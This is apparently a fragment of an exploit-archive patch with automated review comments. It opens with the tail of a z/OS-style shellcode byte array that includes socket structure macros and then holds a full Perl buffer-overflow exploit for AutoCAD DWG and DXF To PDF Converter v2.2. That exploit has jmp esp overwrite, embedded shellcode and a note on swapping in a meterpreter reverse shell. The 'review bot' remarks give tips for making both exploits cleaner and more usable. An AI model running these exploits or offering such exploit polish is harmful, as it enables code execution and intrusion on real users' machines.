DC X'df' "\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53"
A2E DC A(A2EBUF) "\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23"
BPXYSOCK LIST=YES # MACRO MAP for socket structure "\x97\x4b\x20\x01\xa7\x1e\x08\x28\xa7\x44\xff\xf9\x17\x44\x58\xd4"
BPXYFCTL LIST=YES # MACRO MAP for fcntl structure "\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef"
END @SETUP "\xdb\xa7\x9b\x47\x8b\xbb\xb4\xb4\xb4\xb5\x53\x44\x8b\x0b\x4b\x4b"
"\x48\xaf\x1b\x9b\x0b\x4f\x53\x9f\xec\xd3\x4b\x4a\xec\x83\x4b\x4f"
"\xec\xae\x48\x70\x8f\x14\x4b\x4b\x48\xbd\x8f\x24\x4b\x4b\x48\xbe"
"\xec\xae\x48\x78\x8f\x14\x4b\x4b\x48\xb9\x8f\x24\x4b\x4b\x48\xba"
"\x8f\xb6\x4b\x4b\x48\x9f\x8b\x5b\x4b\x4b\x4b\x5a\x53\x3a\x1b\x3c"
"\x4b\x4b\x51\x37\x1b\x3b\x3b\x4b\x51\x37\xee\x31\xcb\x4b\x1b\x3b"
"\x3b\x4b\xec\xbf\x4b\x42\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x66\xb4\xb4\xb4\xb2\xa7\x6c\x4b\xfa"
"\x4b\x35\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x80\x53\x2e\xec\xae"
"\x49\xfe\x8f\x16\x4b\x4b\x48\xf4\x53\x2e\xec\xae\x49\xe4\x0a\x6b"
"\x4b\x43\x8f\x16\x4b\x4b\x48\xf0\x8b\x2a\x4b\x4b\x4b\x4b\xec\xae"
"\x49\xee\x8f\x16\x4b\x4b\x48\xfa\x8b\x2a\x4b\x4b\x4b\x4a\xec\xae"
"\x49\xd6\x8f\x16\x4b\x4b\x48\xe2\x8b\x2a\x4b\x4b\x4b\x49\xec\xae"
"\x49\xde\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\xea\x53\x2e\xec\xae"
"\x49\xc6\x8f\x16\x4b\x4b\x48\xd2\x53\x2e\xec\xae\x49\xcc\x8f\xb6"
"\x4b\x4b\x48\x34\x8b\x5b\x4b\x4b\x4b\x13\x8b\x3b\x4b\x4b\x4b\x0e"
"\x8f\x34\x4b\x4b\x4b\x19\x51\x37\x8f\x34\x4b\x4b\x4b\x1b\x8b\x3b"
"\x4b\x4b\x4b\x0a\x8f\x34\x4b\x4b\x4b\x07\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x75\x51\x37\x8f\x34\x4b\x4b\x4b\x0d\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x71\x51\x37\x8f\x34\x4b\x4b\x4b\x0b\x8b\x3b\x4b\x4b\x48\x1a"
"\x8f\x34\x4b\x4b\x4b\x77\x8f\x34\x4b\x4b\x4b\x70\x8f\x34\x4b\x4b"
"\x4b\x71\x8f\x34\x4b\x4b\x4b\x72\x8f\x34\x4b\x4b\x4b\x73\x8b\x3b"
"\x4b\x4b\x4b\x7c\x8f\x34\x4b\x4b\x4b\x7f\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x79\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x65\xec\x4e"
"\x4b\x66\x4b\x4b\x4b\x4b\x4b\x4c\x2a\xc9\xc2\xde\x2a\xe9\xc3\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4b\x4b\x4b\x4b\xe9\xc3\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\xec\x4e\x49\xa7\x8b\xab"
"\x4b\x4b\x4b\x40\x0a\x6b\x4b\x42\x8f\x16\x4b\x4b\x48\x53\x53\x2e"
"\xec\xbf\x49\x4f\xec\xa1\x4b\x5b\x8f\x16\x4b\x4b\x48\x45\x53\x2e"
"\xec\xbf\x4a\xb7\x8f\xb6\x4b\x4b\x49\xbd\x8b\x5b\x4b\x4b\x4b\x7e"
"\x8b\x3b\x4b\x4b\x49\xa1\x8f\x34\x4b\x4b\x4b\x64\x8b\x3b\x4b\x4b"
"\x49\xa9\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b\x49\x91\x8f\x34"
"\x4b\x4b\x4b\x6c\x8b\x3b\x4b\x4b\x49\x9d\x8f\x34\x4b\x4b\x4b\x68"
"\x8b\x3b\x4b\x4b\x4b\x53\x8f\x34\x4b\x4b\x4b\x54\x8b\x3b\x4b\x4b"
"\x4b\x55\x8f\x34\x4b\x4b\x4b\x50\x51\x37\x8f\x34\x4b\x4b\x4b\x52"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5e\xec\x4e\x4b\x5f"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\xe4\x8b\x5b\x4b\x4b"
"\x4b\x61\x8b\x3b\xb4\xb4\xb4\xac\x8f\x34\x4b\x4b\x4b\x6f\x8b\x3b"
"\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b\x4b\x6b\x8b\x3b\x4b\x4b\x49\xf8"
"\x8f\x34\x4b\x4b\x4b\x57\x8b\x3b\x4b\x4b\x4b\x50\x8f\x34\x4b\x4b"
"\x4b\x53\x51\x37\x8f\x34\x4b\x4b\x4b\x5d\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x59\xec\x4e\x4b\x5a\x4b\x4b\x4b\x4b\x4b\x5b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x53\xb7\x8f\x26\xb4\xb4"
"\xb4\xb3\xa7\x2c\x49\x1a\x4b\x35\x8f\xb6\x4b\x4b\x49\x3b\x8b\x5b"
"\x4b\x4b\x4b\x6a\x8b\x3b\xb4\xb4\xb4\xed\x8f\x34\x4b\x4b\x4b\x50"
"\x8b\x3b\x4b\x4b\x49\x13\x8f\x34\x4b\x4b\x4b\x5c\x8b\x3b\x4b\x4b"
"\x4b\x5d\x8f\x34\x4b\x4b\x4b\x58\x51\x37\x8f\x34\x4b\x4b\x4b\x5a"
"\x51\x37\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x46\xec\x4e\x4b\x47"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xb6\x4b\x4b\x49\x08\x8b\x5b\x4b\x4b"
"\x4b\x7d\x8b\x3b\xb4\xb4\xb4\x3c\x8f\x34\x4b\x4b\x4b\x7b\x8b\x3b"
"\x4b\x4b\x4b\x62\x8f\x34\x4b\x4b\x4b\x67\x8b\x3b\x4b\x4b\x4b\x50"
"\x8f\x34\x4b\x4b\x4b\x63\x8b\x3b\x4b\x4b\x4b\x54\x8f\x34\x4b\x4b"
"\x4b\x6f\x8b\x3b\x4b\x4b\x4b\x68\x8f\x34\x4b\x4b\x4b\x6b\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x57\xec\x4e\x4b\x50\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x5b\x49\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8b\xab\x4b\x4b\x4b\x47\x0a\x6b\x4b\x4f\x8f\x16\xb4\xb4"
"\xb4\xa7\xec\x23\x4b\x4c\xec\xbf\x4b\xba\xec\xa1\x4b\x59\x8f\x16"
"\x4b\x4b\x4a\xb2\xec\x23\x4b\x4d\xec\xbf\x4b\xa3\x8b\x1b\xb4\xb4"
"\xb4\x97\x8b\x3b\x4b\x4b\x4b\x47\xec\xae\x4b\x50\xec\xae\x4a\x22"
"\x8b\x1b\x4b\x4b\x4a\xa5\xec\xae\x4b\xc3\x8b\x1b\x4b\x4b\x4a\xa8"
"\x8b\x3b\xb4\xb4\xb4\xa5\xec\xae\x4b\x47\xec\xae\x4a\xce\x8b\xab"
"\xb4\xb4\xb4\xbd\x8b\x1b\xb4\xb4\xb4\x8b\xec\xbf\x4b\x3d\x8f\xb6"
"\x4b\x4b\x4a\x82\x53\x7c\x8f\xa4\x4b\x4b\x4a\xe4\x8b\x6b\x4b\x4b"
"\x4b\x07\x9c\x4c\x6b\x4b\x6b\x4b\x8b\x6b\x4b\x4b\x4b\x75\x9c\x44"
"\x6b\x4b\x6b\x4b\x8f\x14\x4b\x4b\x4b\x09\x8b\x5b\x4b\x4b\x4b\x74"
"\x8b\x3b\x4b\x4b\x4b\x79\x8f\x34\x4b\x4b\x4b\x60\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x7e\x8b\x3b\x4b\x4b\x4a\xd9\x8f\x34"
"\x4b\x4b\x4b\x7a\x8b\x3b\x4b\x4b\x4b\x55\x8f\x34\x4b\x4b\x4b\x66"
"\x8b\x3b\x4b\x4b\x4b\x69\x8f\x34\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b"
"\x4b\x63\x8f\x34\x4b\x4b\x4b\x6e\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x6a\xec\x4e\x4b\x6b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69\x69"
"\x69\x69\x69\x69\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4e\xa4\x8f\xa6\x4b\x4b\x4a\x04\x53\x38\x53\xb2"
"\x8f\x26\xb4\xb4\xb4\xa1\xa7\x29\xab\x4b\x4b\xb5\xa7\x23\x3b\x4b"
"\xb4\xb5\xec\x4e\x4a\x7a\x8f\xb6\x4b\x4b\x4a\x1c\x8f\xa4\x4b\x4b"
"\x4a\x77\x8b\x5b\x4b\x4b\x4b\x7a\x8b\x3b\xb4\xb4\xb4\x85\x8f\x34"
"\x4b\x4b\x4b\x62\x8b\x3b\x4b\x4b\x4b\x6d\x8f\x34\x4b\x4b\x4b\x6c"
"\x8f\x14\x4b\x4b\x4b\x69\x8b\x3b\x4b\x4b\x4a\x60\x8f\x34\x4b\x4b"
"\x4b\x6b\x8b\x3b\xb4\xb4\xb4\x8a\x8f\x34\x4b\x4b\x4b\x57\x51\x37"
"\x8f\x34\x4b\x4b\x4b\x51\x51\x37\x8f\x34\x4b\x4b\x4b\x53\x51\x37"
"\xee\x31\xcb\x4b\x8f\x34\x4b\x4b\x4b\x5f\xec\x4e\x4b\x58\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xb2\x8f\x26\xb4\xb4\xb4\xbd\x53\xbd"
"\xa7\x23\x4b\xa9\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4a\x43\x8f\xa4"
"\x4b\x4b\x4b\xa0\x8b\x5b\x4b\x4b\x4b\x79\x53\x3a\x50\x37\x50\x37"
"\x50\x37\x8f\x14\x4b\x4b\x4b\x6e\x8f\x34\x4b\x4b\x4b\x63\x8f\x64"
"\x4b\x4b\x4b\x6a\x51\x37\x8f\x34\x4b\x4b\x4b\x68\x8f\x24\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x55\x51\x37\x8f\x34\x4b\x4b"
"\x4b\x57\x51\x37\x8f\x34\x4b\x4b\x4b\x51\x51\x37\xee\x31\xcb\x4b"
"\x8f\x34\x4b\x4b\x4b\x5d\xec\x4e\x4b\x5e\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4e\xa4\x8f\xa6\x4b\x4b\x4b\xe2\x8f\x36\xb4\xb4\xb4\xbd\xa7\x33"
"\x4b\xd8\xb4\x35\x4c\xb5\x8f\xb6\x4b\x4b\x4b\xf0\x8f\xa4\x4b\x4b"
"\x4b\xd7\x8b\x5b\x4b\x4b\x4b\x50\x53\x3a\x8f\x34\x4b\x4b\x4b\x5c"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5e\x51\x37\x8f\x34\x4b\x4b\x4b\x58"
"\x51\x37\x8f\x34\x4b\x4b\x4b\x5a\x51\x37\xee\x31\xcb\x4b\x8f\x34"
"\x4b\x4b\x4b\x46\xec\x4e\x4b\x47\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4e\xa4\x8f\x26"
"\xb4\xb4\xb4\xb2\xa7\x23\x4b\x2b\xb4\x35\x8f\x16\xb4\xb4\xb4\xa4"
"\x8f\x26\xb4\xb4\xb4\xa5\x8f\xa6\x4b\x4b\x4b\x2c\x4c\xb5\x8b\x5b"
"\xb4\xb4\xb5\xb0\x8f\x06\xb4\xb4\xb4\x4b\x8b\x6b\x4b\x4b\x4b\xcc"
"\xec\xc3\x4b\x5e\xa8\x7b\x5b\x4b\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4"
"\x52\x73\xec\x3f\x4b\x4d\xec\x23\x4b\xce\xec\xbf\x4b\x45\xa8\x1b"
"\x6b\x4b\x4b\x3d\x8b\x10\x4b\x4b\x4b\xb4\x51\x62\x51\x22\x52\x7e"
"\xec\x3f\xb4\xbc\x50\x22\x09\x2b\x5b\x4b\x51\x52\x50\x02\xec\x3f"
"\xb4\xa8\x4c\xb5\x8f\x06\xb4\xb4\xb5\x93\x8b\x5b\xb4\xb4\xb5\x86"
"\xec\xc3\x4b\xce\x8b\x6b\x4b\x4b\x4b\x11\x50\x62\xa8\x7b\x5b\x4b"
"\x4b\x3d\x8b\x70\x4b\x4b\x4b\xb4\x52\x73\xec\x3f\x4b\x4d\xec\x73"
"\x4b\x2e\xec\xbf\x4b\x42\x51\x68\xa8\x7b\x6b\x4b\x4b\x3d\x8b\x70"
"\x4b\x4b\x4b\xb4\x09\x7b\x5b\x4b\x51\x52\x50\x02\xec\x3f\xb4\xaf"
"\x4c\xb5\x5c\xb4\x8b\x0b\x4b\x4b\x4b\x5b\x1b\xbb\x0b\x4b\x13\x9b"
"\x0b\x4f\xd3\xa7\x9b\x47\x8b\x0b\x4b\x4b\x4b\x4c\x13\xbb\x0b\x4b"
"\x4c\xb5\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x4b\x4b\x4b\x4a\x4b\x4b\x4b\x49\x4a\x18\x78\xf7\x4a\x18\x78\xef"
"\x4a\x18\x7c\x5b\x4a\x18\x7d\x7d\x4a\x18\x7d\x23\x4a\x18\x7d\x6f"
"\x4a\x18\x78\x55\x4a\x18\x78\xc1\x4a\x18\x79\x07\x4a\x18\x78\x4d"
"\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b\x4b"
"\x49\x49\x7b\x72\x4b\x4b\x4b\x4b\x01\x02\x03\x9c\x09\x86\x7f\x97"
"\x8d\x8e\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x9d\x0a\x08\x87\x18"
"\x19\x92\x8f\x1c\x1d\x1e\x1f\x80\x81\x82\x83\x84\x85\x17\x1b\x88"
"\x89\x8a\x8b\x8c\x05\x06\x07\x90\x91\x16\x93\x94\x95\x96\x04\x98"
"\x99\x9a\x9b\x14\xff\x9e\x1a\x20\xa0\xe2\xe4\xe0\xe1\xe3\xe5\xe7"
"\xf1\xa2\x2e\x3c\x28\x2b\x7c\x26\xe9\xea\xeb\xe8\xed\xee\xef\xec"
"\xdf\x21\x24\x2a\x29\x3b\x5e\x2d\x2f\xc2\xc4\xc0\xc1\xc3\xc5\xc7"
"\xd1\xa6\x2c\x25\x5f\x3e\x3f\xf8\xc9\xca\xcb\xc8\xcd\xce\xcf\xcc"
"\x60\x3a\x23\x40\x27\x3d\x22\xd8\x61\x62\x63\x64\x65\x66\x67\x68"
"\x69\xab\xbb\xf0\xfd\xfe\xb1\xb0\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71"
"\x72\xaa\xba\xe6\xb8\xc6\xa4\xb5\x7e\x73\x74\x75\x76\x77\x78\x79"
"\x7a\xa1\xbf\xd0\x5b\xde\xae\xac\xa3\xa5\xb7\xa9\xa7\xb6\xbc\xbd"
"\xbe\xdd\xa8\xaf\x5d\xb4\xd7\x7b\x41\x42\x43\x44\x45\x46\x47\x48"
"\x49\xad\xf4\xf6\xf2\xf3\xf5\x7d\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51"
"\x52\xb9\xfb\xfc\xf9\xfa\xff\x5c\xf7\x53\x54\x55\x56\x57\x58\x59"
"\x5a\xb2\xd4\xd6\xd2\xd3\xd5\x30\x31\x32\x33\x34\x35\x36\x37\x38"
"\x39\xb3\xdb\xdc\xd9\xda\x9f\xf0";
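Review bot: the banner lines above `char sc[]=` use `\* ... *\` as comment delimiters, which are not valid C, so the file cannot be dropped into a C harness as written; use `/* ... */`. The byte string also contains the words `\xde\xad\xbe\xef` twice in the loader stub with no comment saying whether these are patched at run time, by whom, and with what; document that, or the payload reads as if it jumps to an undefined address. Declaring the array as `unsigned char sc[]` (and giving it `const`) would also make the intent clearer than a plain `char` array holding bytes above 0x7f.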

platforms/win64/dos/38085.pl Executable file



@ -0,0 +1,48 @@
#*************************************************************************************************************
#
# Exploit Title: AutoCAD DWG and DXF To PDF Converter v2.2 Buffer Overflow
# Date: 9-5-2015
# Software Link: http://www.verypdf.com/autocad-dwg-dxf-to-pdf/dwg_dxf_to_pdf_setup.exe
# Exploit Author: Robbie Corley
# Contact: c0d3rc0rl3y@gmail.com
# Website:
# CVE:
# Category: Local Exploit
#
# Description:
# The title parameter passed into the program that specifies the title of the converted PDF is vulnerable to a buffer overflow.
# This can be exploited using EIP direct overwrite, SEH bypass, and ROP.
# EIP was easier and afforded more universal exploitation so I went that route after SEH bypass limited the exploit's universal OS compatibility
# Enjoy! (Proofs included)
#
# Instructions: Run this as-is (if on x64 platform) and hit the [try] button when the program opens.
#
#**************************************************************************************************************
#standard messagebox shellcode.
#Adapts readily to windows/meterpreter/reverse_tcp using msfvenom --smallest
my $shellcode =
"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42".
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03".
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74".
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
open(myfile,'>crasher.dwf'); #generate the dummy DWF file
print myfile "yattayattayatta"; #gibberish to go in file
close (myfile); #close the file
$sploit=pack('V',0x100126db); #jmp esp specific to Windows 7 x64 [found within the packed section of the executable :) ]
$cmd='"C:\\Program Files (x86)\\AutoCAD DWG and DXF To PDF Converter v2.2\\dwg2pdf.exe"'; #change this if you are on a 32-bit based processor
$cmd .= ' -t "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAargvbhewthvboiwetuhnvoehntoeqothnogobtehnvohjnoeqhngovenhjotgvnoehnogveoqnvobeqntgoh2io4gh894gh942h9gth249h92hg49h2g9h429gh4g9h429hg9th4g9h489gh849hg894h982hg984hg98h4298hg9842hg8942hg8942h298hg4298hg8942hg894hg9hg398gh78358h35g3h8352g8h32h5g8v3ig25bgb3958v938g983h98g3h9gh3259hg3529gh93vbh98v893hg89h5329g8h3598gth93vb583gfb9358fb929b3g29b8g25389bg2538b9g5238b952g38bg925gb28958b925v89bcc88r2cxnbx2rnb982c552b89c25vb8725vg852v8528g52g8258787g5g87253g8723487gfc32g87c23g78c23g78cg387cg7823c2g837cg738cg7853S25hg532gfh3295g8h83295gtf352tu539t8u3529tg5938gt932ut235yt9235yt98325yt92358yv8935vy8953vy5239vy293v8y352v98y32895vy9352yv932yv9y329vy239vy9325y298fy92358fy9253fn53ngj25ngn53n53ngln235lgn2l35ngl235ng3ljnghln3hg239hbu390gu23905ug935guy92835ut893ug9u39gvu935ugvb8953u938ug9835y2395fy2398fy9325fy9325yf932yf9y2359f2359fy2395vy598vy5392vy2395vy3295yv9358yv39258vy9238yv9235hgt9h23g59h23';
$cmd .= $sploit;
$cmd .= $shellcode;
$cmd .= '" -i crasher.dwf -o test.pdf'; # append our arguments to the end
system($cmd);
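Review bot: `open(myfile,'>crasher.dwf')` uses a bareword filehandle and the two-argument form with no error check, so if the file cannot be created the script silently goes on to launch the converter against a missing input; use `open(my $fh, '>', 'crasher.dwf') or die "crasher.dwf: $!";` and `print $fh ...` / `close $fh`. The script also lacks `use strict; use warnings;` (under which the undeclared `$sploit` and `$cmd` would be flagged), and the `# Website:` and `# CVE:` header fields are empty. The return value of `system($cmd)` is discarded; checking `$?` would at least distinguish "converter not found at the hard-coded path" from a run that actually started.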